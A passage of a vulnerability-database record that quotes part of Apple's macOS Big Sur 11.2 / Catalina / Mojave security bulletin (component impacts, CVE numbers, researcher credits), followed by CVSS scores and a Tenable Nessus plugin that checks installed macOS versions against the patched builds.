(@_r3ggi) of SecuRing\n\n**Endpoint Security**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1802: Zhongcheng Li (@CK01) of WPS Security Response Center\n\n**FairPlay**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu (@pwn0rz), Qi Sun & Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**FontParser**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted font may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1790: Peter Nguyen Vu Hoang of STAR Labs\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted font may lead to arbitrary code execution\n\nDescription: This issue was addressed by removing the vulnerable code.\n\nCVE-2021-1775: Mickey Jin and Qi Sun of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated March 16, 2021\n\n**FontParser**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-29608: Xingwei Lin of Ant Security Light-Year Lab\n\n**FontParser**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\n** \nImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1736: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: macOS Catalina 10.15.7, macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1742: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1746: Jeonghoon Shin(@singi21a) of THEORI, Mickey Jin & Qi Sun of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1754: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1774: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1777: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: macOS Big Sur 11.0.1 and macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1737: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1738: Lei Sun\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\n**IOKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A logic error in kext loading was addressed with improved state handling.\n\nCVE-2021-1779: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**IOSkywalkFamily**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Pan ZhenPeng (@Peterpan0927) of Alibaba Security, Proteas\n\n**Kernel**\n\nAvailable for: macOS Catalina 10.15.7 and macOS Mojave 10.14.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqiong Security Lab\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: @m00nbsd\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\n**Login Window**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: An attacker in a privileged network position may be able to bypass authentication policy\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2020-29633: Jewel Lambert of Original Spin, LLC.\n\n**Messages**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.\n\nCVE-2021-1781: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added March 16, 2021\n\n**Messages**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A user that is removed from an iMessage group could rejoin the group\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1771: Shreyas Ranganatha (@strawsnoceans)\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1762: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated March 16, 2021\n\n**Model I/O**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Processing a maliciously crafted file may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-29614: ZhiWei Sun (@5n1p3r0010) of Topsec Alpha Lab\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-1763: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1767: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1745: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1753: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**Model I/O**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1768: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\n**NetFSFramework**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1751: Mikko Kentt\u00e4l\u00e4 (@Turmio_) of SensorFu\n\n**OpenLDAP**\n\nAvailable for: macOS Big Sur 11.0.1, macOS Catalina 10.15.7, and macOS Mojave 10.14.6\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-25709\n\n**Power Management**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.7\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2020-27938: Tim Michaud (@TimGMichaud) of Leviathan\n\n**Screen Sharing**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Multiple issues in pcre\n\nDescription: Multiple issues were addressed by updating to version 8.44.\n\nCVE-2019-20838\n\nCVE-2020-14155\n\n**SQLite**\n\nAvailable for: macOS Catalina 10.15.7\n\nImpact: Multiple issues in SQLite\n\nDescription: Multiple issues were addressed with improved checks.\n\nCVE-2020-15358\n\n**Swift**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1765: Eliya Stein of Confiant\n\nCVE-2021-1801: Eliya Stein of Confiant\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\n**WebKit**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2021-1871: an anonymous researcher\n\nCVE-2021-1870: an anonymous researcher\n\n**WebRTC**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\n**XNU**\n\nAvailable for: macOS Big Sur 11.0.1\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-30869: Apple\n\nEntry added September 23, 2021\n\n\n\n## Additional recognition\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\n**Login Window**\n\nWe would like to acknowledge Jose Moises Romero-Villanueva of CrySolve for their assistance.\n\n**Mail Drafts**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\n**Screen Sharing Server**\n\nWe would like to acknowledge @gorelics for their assistance.\n\n**WebRTC**\n\nWe would like to acknowledge Philipp Hancke for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 23, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-01T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20838", "CVE-2020-14155", "CVE-2020-15358", "CVE-2020-25709", "CVE-2020-27904", "CVE-2020-27937", "CVE-2020-27938", "CVE-2020-27945", "CVE-2020-29608", "CVE-2020-29614", "CVE-2020-29633", "CVE-2021-1736", "CVE-2021-1737", "CVE-2021-1738", "CVE-2021-1741", "CVE-2021-1742", "CVE-2021-1743", "CVE-2021-1744", "CVE-2021-1745", "CVE-2021-1746", "CVE-2021-1747", "CVE-2021-1750", "CVE-2021-1751", "CVE-2021-1753", "CVE-2021-1754", "CVE-2021-1757", "CVE-2021-1758", "CVE-2021-1759", "CVE-2021-1760", "CVE-2021-1761", "CVE-2021-1762", "CVE-2021-1763", "CVE-2021-1764", "CVE-2021-1765", "CVE-2021-1766", "CVE-2021-1767", "CVE-2021-1768", "CVE-2021-1769", "CVE-2021-1771", "CVE-2021-1772", "CVE-2021-1773", "CVE-2021-1774", "CVE-2021-1775", "CVE-2021-1776", "CVE-2021-1777", "CVE-2021-1778", "CVE-2021-1779", "CVE-2021-1781", "CVE-2021-1782", "CVE-2021-1783", "CVE-2021-1785", "CVE-2021-1786", "CVE-2021-1787", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1790", "CVE-2021-1791", "CVE-2021-1792", "CVE-2021-1793", "CVE-2021-1797", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1802", "CVE-2021-1818", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-30869"], "modified": "2021-02-01T00:00:00", "id": "APPLE:B42E67860AD9D9F5B9307A29A1189DF0", "href": "https://support.apple.com/kb/HT212147", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:24:32", "description": "The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.6 Security Update 2021-001 Mojave, 10.15.x prior to 10.15.7 Security Update 2021-001 Catalina, or 11.x prior to 11.2. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n An application may be able to execute arbitrary code with kernel privileges. (CVE-2020-27904)\n\n - A logic issue existed that allowed applications to execute arbitrary code with kernel privileges.\n (CVE-2021-1750)\n\n - An out-of-bounds-write caused by improper input validation allowed maliciously crafted USD files to unexpectedly terminate an application or cause arbitrary code execution. (CVE-2021-1762)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2021-02-03T00:00:00", "type": "nessus", "title": "macOS 10.14.x < 10.14.6 Security Update 2021-001 / 10.15.x < 10.15.7 Security Update 2021-001 / macOS 11.x < 11.2 (HT212147)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-20838", "CVE-2020-14155", "CVE-2020-15358", "CVE-2020-25709", "CVE-2020-27904", "CVE-2020-27937", "CVE-2020-27938", "CVE-2020-27945", "CVE-2020-29608", "CVE-2020-29614", "CVE-2020-29633", "CVE-2021-1736", "CVE-2021-1737", "CVE-2021-1738", "CVE-2021-1741", "CVE-2021-1742", "CVE-2021-1743", "CVE-2021-1744", "CVE-2021-1745", "CVE-2021-1746", "CVE-2021-1747", "CVE-2021-1750", "CVE-2021-1751", "CVE-2021-1753", "CVE-2021-1754", "CVE-2021-1757", "CVE-2021-1758", "CVE-2021-1759", "CVE-2021-1760", "CVE-2021-1761", "CVE-2021-1762", "CVE-2021-1763", "CVE-2021-1764", "CVE-2021-1765", "CVE-2021-1766", "CVE-2021-1767", "CVE-2021-1768", "CVE-2021-1769", "CVE-2021-1771", "CVE-2021-1772", "CVE-2021-1773", "CVE-2021-1774", "CVE-2021-1775", "CVE-2021-1776", "CVE-2021-1777", "CVE-2021-1778", "CVE-2021-1779", "CVE-2021-1782", "CVE-2021-1783", "CVE-2021-1785", "CVE-2021-1786", "CVE-2021-1787", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1790", "CVE-2021-1791", "CVE-2021-1792", "CVE-2021-1793", "CVE-2021-1797", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1802", "CVE-2021-1818", "CVE-2021-1870", "CVE-2021-1871"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT212147.NASL", "href": "https://www.tenable.com/plugins/nessus/146086", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146086);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2019-20838\",\n \"CVE-2020-14155\",\n \"CVE-2020-15358\",\n \"CVE-2020-25709\",\n \"CVE-2020-27904\",\n \"CVE-2020-27937\",\n \"CVE-2020-27938\",\n \"CVE-2020-27945\",\n \"CVE-2020-29608\",\n \"CVE-2020-29614\",\n \"CVE-2020-29633\",\n \"CVE-2021-1736\",\n \"CVE-2021-1737\",\n \"CVE-2021-1738\",\n \"CVE-2021-1741\",\n \"CVE-2021-1742\",\n \"CVE-2021-1743\",\n \"CVE-2021-1744\",\n \"CVE-2021-1745\",\n \"CVE-2021-1746\",\n \"CVE-2021-1747\",\n \"CVE-2021-1750\",\n \"CVE-2021-1751\",\n \"CVE-2021-1753\",\n \"CVE-2021-1754\",\n \"CVE-2021-1757\",\n \"CVE-2021-1758\",\n \"CVE-2021-1759\",\n \"CVE-2021-1760\",\n \"CVE-2021-1761\",\n \"CVE-2021-1762\",\n \"CVE-2021-1763\",\n \"CVE-2021-1764\",\n \"CVE-2021-1765\",\n \"CVE-2021-1766\",\n \"CVE-2021-1767\",\n \"CVE-2021-1768\",\n \"CVE-2021-1769\",\n \"CVE-2021-1771\",\n \"CVE-2021-1772\",\n \"CVE-2021-1773\",\n \"CVE-2021-1774\",\n \"CVE-2021-1775\",\n \"CVE-2021-1776\",\n \"CVE-2021-1777\",\n \"CVE-2021-1778\",\n \"CVE-2021-1779\",\n \"CVE-2021-1782\",\n \"CVE-2021-1783\",\n \"CVE-2021-1785\",\n \"CVE-2021-1786\",\n \"CVE-2021-1787\",\n \"CVE-2021-1788\",\n \"CVE-2021-1789\",\n \"CVE-2021-1790\",\n \"CVE-2021-1791\",\n \"CVE-2021-1792\",\n \"CVE-2021-1793\",\n \"CVE-2021-1797\",\n \"CVE-2021-1799\",\n \"CVE-2021-1801\",\n \"CVE-2021-1802\",\n \"CVE-2021-1818\",\n \"CVE-2021-1870\",\n \"CVE-2021-1871\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT212147\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2021-02-01-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0058\");\n script_xref(name:\"IAVA\", value:\"2021-A-0505-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"macOS 10.14.x < 10.14.6 Security Update 2021-001 / 10.15.x < 10.15.7 Security Update 2021-001 / macOS 11.x < 11.2 (HT212147)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.6 Security Update 2021-001\nMojave, 10.15.x prior to 10.15.7 Security Update 2021-001 Catalina, or 11.x prior to 11.2. It is, therefore, affected by\nmultiple vulnerabilities, including the following:\n\n - A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n An application may be able to execute arbitrary code with kernel privileges. (CVE-2020-27904)\n\n - A logic issue existed that allowed applications to execute arbitrary code with kernel privileges.\n (CVE-2021-1750)\n\n - An out-of-bounds-write caused by improper input validation allowed maliciously crafted USD files to\n unexpectedly terminate an application or cause arbitrary code execution. (CVE-2021-1762)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT212147\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.14.6 Security Update 2021-001 / 10.15.7 Security Update 2021-001 / macOS 11.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1779\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1871\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { 'max_version' : '10.14.6', 'min_version' : '10.14', 'fixed_build': '18G8012', 'fixed_display' : '10.14.6 Security Update 2021-001 Mojave' },\n { 'max_version' : '10.15.7', 'min_version' : '10.15', 'fixed_build': '19H512', 'fixed_display' : '10.15.7 Security Update 2021-001 Catalina' },\n { 'min_version' : '11.0', 'fixed_version' : '11.2', 'fixed_display' : 'macOS Big Sur 11.2' }\n];\n\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}
CVE-2021-1772
